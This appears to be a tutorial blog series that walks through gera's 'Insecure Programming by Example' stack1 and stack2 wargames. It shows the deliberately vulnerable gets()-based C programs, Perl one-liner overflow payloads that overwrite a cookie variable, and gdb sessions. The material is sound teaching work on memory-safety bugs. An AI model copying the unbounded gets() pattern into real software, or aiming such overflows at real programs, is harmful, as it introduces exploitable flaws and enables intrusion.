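Here is a rough Python model of the difference, using the stack3 payload from above. The names gets_like and strcpy_like are made up, and they only model where each function stops; the real functions also append a terminating null byte and, of course, write into memory.

```python
def gets_like(stream):
    """Bytes a gets()-style reader stores: everything before the first newline
    (or the whole stream if end-of-file comes first)."""
    return stream.split(b"\n", 1)[0]

def strcpy_like(src):
    """Bytes a strcpy()-style copy moves: everything before the first NUL."""
    return src.split(b"\x00", 1)[0]

# The stack3 solution: 80 filler bytes, then the cookie in little-endian order.
payload = b"A" * 80 + b"\x05\x00\x02\x01" + b"\n"
print(len(gets_like(payload)), len(strcpy_like(payload)))
```

The gets()-style reader keeps all 84 bytes, null included, while the strcpy()-style copy gives up after 81, which is exactly the situation where this challenge would have been harder.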

There will be more exploration of values that terminate our gets() function prematurely in upcoming articles, in the meantime, thanks for reading :-).

Insecure Programming by Example: gdb debugging & stack2.c

This post will be less detailed than the previous one, mainly because most of the concepts are identical.

Here is Insecure Programming by Example stack2.c:

/* stack2-stdin.c                               *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);	/* no bounds check: input can run past buf */

	if (cookie == 0x01020305)
		printf("you win!\n");
}

As you can see, the only real change is the value of the cookie variable. Seems simple enough, right? We can just send the program “5321” and be done with it! Of course, there is a reason gera wrote this almost-identical challenge, which will become apparent shortly. Let’s compile it and try to feed it the “5321” string, and see what happens.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack2 stack2.c
/tmp/cc5NHEBj.o: In function `main':
/home/mishley/InsecureProgramming/stack2.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack2
buf: bffffa00 cookie: bffffa50
debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321";' | ./stack2
buf: bffffa00 cookie: bffffa50
Segmentation fault

Ok, this is odd. We successfully overflowed the buffer, because we segfaulted, presumably from clobbering the return address (or something else important) in main()’s stack frame. But it appears we didn’t get the “you win!” message we expected…like I said, things are not always this easy, and there is a good reason gera wrote this challenge. Now is the time to attach a debugger and take a look at why we are having some issues with this challenge. We will use GDB as our debugger-of-choice. It is adequate to this task, though for more complicated exploitation on other platforms (e.g., Windows) a GUI-based debugger like OllyDbg or Immunity Debugger might be preferred.

Using a debugger allows us to manually step through the execution of the code at the CPU or assembly language level and examine the state of the program at breakpoints we set during the execution. Think of a breakpoint as a pause button in your favorite video game: while the game is paused you can examine your inventory and statistics, change equipment, etc. In the same way, while execution is paused in a debugger you can examine the state of the registers, stack traces and frames, and the contents of RAM itself.

It would probably be good at this point for the reader to familiarize themselves with the basic premises of how a computer works (we’re talking Von Neumann machines here, of the x86 variety ;-)). I couldn’t find a really good explanation on short notice, but there are a couple of good books on the subject. Various parts of “Hacking: The Art of Exploitation” by Jon Erickson and “Gray Hat Hacking: The Ethical Hacker’s Handbook” by Various Artists cover this in multiple locations. The best intro I own, which is probably more in-depth than anyone but a CE/EE cares to know, is “Inside the Machine” by Jon Stokes. If you are looking for something you can read online for free, there is a GREAT book by Jonathan Bartlett called “Programming from the Ground Up” that covers all of the needed basics, including teaching the reader how to write real programs in pure assembly. Best of all, it can be read online or downloaded for free, and is available from online booksellers for a reasonable price. I personally bought the book after using the online edition a lot, because he did a great job.

With that said, let’s use our debugger to examine the state of the system at the time of the segfault and see why the heck we didn’t get our “you win!” love from the program.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "5321\n";'
debian5:/home/mishley/InsecureProgramming# gdb -q ./stack2
(gdb) list
1	/* stack2-stdin.c                               *
2	 * specially crafted to feed your brain by gera */
4	#include <stdio.h>
6	int main() {
7		int cookie;
8		char buf[80];
10		printf("buf: %08x cookie: %08x\n", &buf, &cookie);
(gdb) list
11		gets(buf);
13		if (cookie == 0x01020305)
14	  		printf("you win!\n");
15	}
(gdb) break 13
Breakpoint 1 at 0x804843a: file stack2.c, line 13.
(gdb) run
Starting program: /home/mishley/InsecureProgramming/stack2
buf: bffff9d0 cookie: bffffa20

Breakpoint 1, main () at stack2.c:13
13		if (cookie == 0x01020305)
(gdb) x/x &cookie
0xbffffa20:	0x31323335
(gdb) quit
The program is running.  Exit anyway? (y or n) y

What we see in the output of x/x &cookie is that the cookie variable holds 0x31323335, that is, the bytes 0x35, 0x33, 0x32 and 0x31 in memory order (remember your endian-ness). Which is curious, since we specified “5321” in our print statement…what could be happening here? The answer is that we are not passing the numeric values 5, 3, 2 and 1 via the print statement; instead we are passing the ASCII codes for the characters “5321”, which sure enough are 0x35, 0x33, 0x32, and 0x31. So what we need here is an easy way to pass arbitrary byte values via Perl’s print statement. The easiest way to do this is to use hex escapes, so that we print exactly the raw bytes we specify. Here is an example with the problem we have faced in this article solved.

debian5:/home/mishley/InsecureProgramming# perl -e 'print "A" x 80 . "\x05\x03\x02\x01\n";' | ./stack2
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

By using the Perl escape sequence \xNN we can print raw bytes to the STDIN of the stack2 program, successfully overwriting the cookie variable via a stack buffer overflow, and winning the game! I hope folks are finding these articles informative; I know I am learning a lot having to write it all out.

Insecure Programming by Example: Intro & stack1.c

I’m going to start documenting the Insecure Programming by Example series of wargames by gera from Core.  I have already completed the stackN.c series, and want to go through my solutions to document what I did and tickle my memory a bit, as I did this about 4 months ago.

Here is stack1.c:

/* stack1.c                                     *
 * specially crafted to feed your brain by gera */

#include <stdio.h>

int main() {
	int cookie;
	char buf[80];

	printf("buf: %08x cookie: %08x\n", &buf, &cookie);
	gets(buf);

	if (cookie == 0x41424344)
		printf("you win!\n");
}

In the gets(buf) line, you can see they are using the gets() function to store supplied data (via STDIN) in the “buf” character array. This, as we will see, is a bad idea, because gets() does no length checking to ensure the data will not overflow the 80 bytes allocated for the buf array; hence an overflow condition exists.

All of the stackN.c series essentially follow this same framework, the idea being to get the program to print “you win!” when run by providing input via the vulnerable gets() function. You also should not change the code.

Let’s compile the program and give it a run, so we can see where the variables are stored in memory. For the purposes of these exercises I’ll be using Linux and the GNU Compiler Collection (with gdb as my debugger), and I’ll be turning off process memory randomization by setting /proc/sys/kernel/randomize_va_space to 0.

debian5:/home/mishley/InsecureProgramming# gcc -ggdb -o stack1 stack1.c
/tmp/ccCsgKNz.o: In function `main':
/home/mishley/InsecureProgramming/stack1.c:11: warning: the `gets' function is dangerous and should not be used.
debian5:/home/mishley/InsecureProgramming# ./stack1
buf: bffffa00 cookie: bffffa50

Notice that GCC itself warns us that the program is using the gets() function and that it is generally a bad idea. We can see from the output of the command that the “buf” variable is located exactly 80 bytes below the “cookie” variable (0xbffffa50 - 0xbffffa00 = 0x50 = 80). Based on this byte count, an understanding of how process memory is allocated, and the use of the insecure gets() function, we should be able to overwrite the cookie variable with the required value and print “you win!”. If you want to understand a bit more about how stack buffer overflows work, a good starting point is the Wikipedia article, and if you are a more advanced user, the paper “Smashing the Stack for Fun and Profit” by Aleph One, published in Phrack #49.

Enough of that, let’s talk about building the “exploit”…that’s a pretty grand name for something which we’re just going to use some simple Perl for ;-). Anyways, we identified that the two buffers (the one we can write to and the one we can’t) are separated by 80 bytes of space, so essentially we will write 80 garbage bytes plus whatever the heck we want the cookie var to end up being, and the write operations from gets() will overwrite whatever is there.

In order to win, we’ll need to get the cookie variable to equal 0x41424344 (which is hexadecimal for the uninitiated). Fortunately, this is pretty easy to do, since those are ASCII character codes, and I can use the Perl print statement to print the characters equivalent to those values to the input pipe of the stack1 program. Finally I should mention that due to the little-endian nature of memory in x86-compatible processors (which I am assuming you are using, as are most of us), I have to reverse the byte/character order when sending it to the gets() function…you’ll see.


debian5:/home/mishley/InsecureProgramming# perl -e 'print "A"x80 . "DCBA";' | ./stack1
buf: bffffa00 cookie: bffffa50
you win!
Segmentation fault

It should be noted that the segmentation fault likely occurs because the overflow also corrupts data saved in main()’s stack frame just past the cookie variable (a saved register or the return address). If you wanted to be more careful, you could examine the memory while stepping through a debugger, overwrite those saved values properly, and cause the program to exit normally. I’ll leave that as an exercise to the reader…if there are any :-).  I hope this is as informative to anyone that reads it as it was to me to have to think it through and write it.